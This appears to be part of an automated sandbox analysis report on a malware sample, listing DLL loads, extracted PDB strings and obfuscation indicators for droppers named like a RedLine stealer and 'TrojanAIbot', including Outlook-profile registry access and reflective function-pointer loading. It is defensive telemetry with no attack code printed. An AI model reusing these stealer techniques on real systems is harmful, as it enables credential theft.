                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\Locator.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\Locator.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\Locator.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\Locator.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\Locator.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\Locator.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\Locator.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: spectrumsyncclient.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                        Source: Window Recorder	Window detected: More than 3 window changes detected
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                        Source: AENiBH7X1q.exe	Static file information: File size 5301537 > 1048576
                        Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: microsofts.exe, 00000003.00000003.2769160993.0000000000830000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000002.00000003.2102495566.0000000005B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: microsofts.exe, 00000003.00000003.2831331065.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2847723654.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2829725346.00000000008B0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: msiexec.pdb source: microsofts.exe, 00000003.00000003.2218314325.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: microsofts.exe, 00000003.00000003.2463831926.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ssh-agent.pdb source: microsofts.exe, 00000003.00000003.2300579828.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: microsofts.exe, 00000003.00000003.2589946017.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: microsofts.exe, 00000003.00000003.2589946017.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: msiexec.pdbGCTL source: microsofts.exe, 00000003.00000003.2218314325.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ADelRCP_Exec.pdb source: microsofts.exe, 00000003.00000003.2608107217.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: mavinject32.pdbGCTL source: microsofts.exe, 00000003.00000003.2887150283.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2890897285.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PresentationFontCache.pdb source: microsofts.exe, 00000003.00000003.2164056345.0000000006AC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PerceptionSimulationService.pdb source: microsofts.exe, 00000003.00000003.2231923378.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: _.pdb source: microsofts.exe, 00000003.00000003.2107829851.00000000006B6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: AENiBH7X1q.exe, 00000000.00000003.2101066429.0000000004160000.00000004.00001000.00020000.00000000.sdmp, AENiBH7X1q.exe, 00000000.00000003.2101195930.0000000004300000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: microsofts.exe, 00000003.00000003.2511558712.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: microsofts.exe, 00000003.00000003.2762958327.0000000000870000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: MsSense.pdbGCTL source: microsofts.exe, 00000003.00000003.2259403992.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: microsofts.exe, 00000003.00000003.2872096963.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: MsSense.pdb source: microsofts.exe, 00000003.00000003.2259403992.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: FXSSVC.pdb source: microsofts.exe, 00000003.00000003.2157871233.00000000069F0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: microsofts.exe, 00000003.00000003.2778209825.0000000000850000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2785772651.00000000005A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: WmiApSrv.pdbGCTL source: microsofts.exe, 00000003.00000003.2357680780.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: microsofts.exe, 00000003.00000003.2646074377.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: Acrobat_SL.pdb((( source: microsofts.exe, 00000003.00000003.2472349372.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: locator.pdb source: microsofts.exe, 00000003.00000003.2246280427.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2256193933.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb8 source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: microsofts.exe, 00000003.00000003.2131039214.00000000069E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ADelRCP_Exec.pdbCC9 source: microsofts.exe, 00000003.00000003.2608107217.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: microsofts.exe, 00000003.00000003.2491136403.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: Acrobat_SL.pdb source: microsofts.exe, 00000003.00000003.2472349372.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: microsofts.exe, 00000003.00000003.2831331065.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2847723654.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2829725346.00000000008B0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: microsofts.exe, 00000003.00000003.2511558712.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: microsofts.exe, 00000003.00000003.2673696878.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: microsofts.exe, 00000003.00000003.2463831926.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: mavinject32.pdb source: microsofts.exe, 00000003.00000003.2887150283.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2890897285.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: PerceptionSimulationService.pdbGCTL source: microsofts.exe, 00000003.00000003.2231923378.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: msdtcexe.pdbGCTL source: microsofts.exe, 00000003.00000003.2207092698.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: 64BitMAPIBroker.pdb source: microsofts.exe, 00000003.00000003.2745183180.00000000005F0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: snmptrap.pdbGCTL source: microsofts.exe, 00000003.00000003.2272309443.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: maintenanceservice.pdb source: microsofts.exe, 00000003.00000003.2200285404.00000000067D0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PerfHost.pdbGCTL source: microsofts.exe, 00000003.00000003.2236404735.0000000006B00000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2237338416.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2244683522.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: microsofts.exe, 00000003.00000003.2872096963.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: microsofts.exe, 00000003.00000003.2720656204.00000000005B0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: microsofts.exe, 00000003.00000003.2646074377.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: microsofts.exe, 00000003.00000003.2730082068.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PerfHost.pdb source: microsofts.exe, 00000003.00000003.2236404735.0000000006B00000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2237338416.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2244683522.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: microsofts.exe, 00000003.00000003.2673696878.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: microsofts.exe, 00000003.00000003.2769160993.0000000000830000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb346 source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: microsofts.exe, 00000003.00000003.2762958327.0000000000870000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: maintenanceservice.pdb` source: microsofts.exe, 00000003.00000003.2200285404.00000000067D0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: microsofts.exe, 00000003.00000003.2778209825.0000000000850000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2785772651.00000000005A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: AENiBH7X1q.exe, 00000000.00000003.2101066429.0000000004160000.00000004.00001000.00020000.00000000.sdmp, AENiBH7X1q.exe, 00000000.00000003.2101195930.0000000004300000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: TieringEngineService.pdb source: microsofts.exe, 00000003.00000003.2313254349.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: TieringEngineService.pdbGCTL source: microsofts.exe, 00000003.00000003.2313254349.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: WmiApSrv.pdb source: microsofts.exe, 00000003.00000003.2357680780.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: microsofts.exe, 00000003.00000003.2681750545.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: System.ServiceModel.pdb source: build.exe, 00000006.00000002.3520993422.0000000006576000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ALG.pdb source: microsofts.exe, 00000003.00000003.2107943827.00000000050A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb8v= source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: msdtcexe.pdb source: microsofts.exe, 00000003.00000003.2207092698.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: microsofts.exe, 00000003.00000003.2131039214.00000000069E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ALG.pdbGCTL source: microsofts.exe, 00000003.00000003.2107943827.00000000050A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: microsofts.exe, 00000003.00000003.2164056345.0000000006AC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: locator.pdbGCTL source: microsofts.exe, 00000003.00000003.2246280427.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2256193933.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: microsofts.exe, 00000003.00000003.2491136403.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: FXSSVC.pdbGCTL source: microsofts.exe, 00000003.00000003.2157871233.00000000069F0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ssh-agent.pdbX source: microsofts.exe, 00000003.00000003.2300579828.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: AppVShNotify.pdb source: microsofts.exe, 00000003.00000003.2867041364.00000000008A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb^ source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: snmptrap.pdb source: microsofts.exe, 00000003.00000003.2272309443.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: microsofts.exe, 00000003.00000003.2730082068.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: microsofts.exe, 00000003.00000003.2681750545.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: AppVShNotify.pdbGCTL source: microsofts.exe, 00000003.00000003.2867041364.00000000008A0000.00000004.00001000.00020000.00000000.sdmp

                        Data Obfuscation

                        Source: Native_Redline_BTC.exe.2.dr, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 2.2.svchost.exe.6200000.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: appvcleaner.exe.3.dr Static PE information: 0xBEAF7172 [Mon May 18 10:01:22 2071 UTC]
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress, 0_2_0040EB70
                        Source: Native_Redline_BTC.exe.2.dr Static PE information: real checksum: 0x0 should be: 0x9799b
                        Source: AENiBH7X1q.exe Static PE information: real checksum: 0xa2135 should be: 0x516b19
                        Source: armsvc.exe.2.dr Static PE information: section name: .didat
                        Source: Acrobat.exe.3.dr Static PE information: section name: .didat
                        Source: private_browsing.exe.3.dr Static PE information: section name: .00cfg
                        Source: private_browsing.exe.3.dr Static PE information: section name: .voltbl
                        Source: updater.exe.3.dr Static PE information: section name: .00cfg
                        Source: updater.exe.3.dr Static PE information: section name: .voltbl
                        Source: updater.exe.3.dr Static PE information: section name: _RDATA
                        Source: setup.exe.3.dr Static PE information: section name: .didat
                        Source: setup.exe.3.dr Static PE information: section name: _RDATA
                        Source: IntegratedOffice.exe.3.dr Static PE information: section name: .didat
                        Source: IntegratedOffice.exe.3.dr Static PE information: section name: _RDATA
                        Source: OfficeC2RClient.exe.3.dr Static PE information: section name: .didat
                        Source: OfficeC2RClient.exe.3.dr Static PE information: section name: .detourc
                        Source: officesvcmgr.exe.3.dr Static PE information: section name: .didat
                        Source: chrome_pwa_launcher.exe.3.dr Static PE information: section name: .00cfg
                        Source: chrome_pwa_launcher.exe.3.dr Static PE information: section name: .gxfg
                        Source: chrome_pwa_launcher.exe.3.dr Static PE information: section name: .retplne
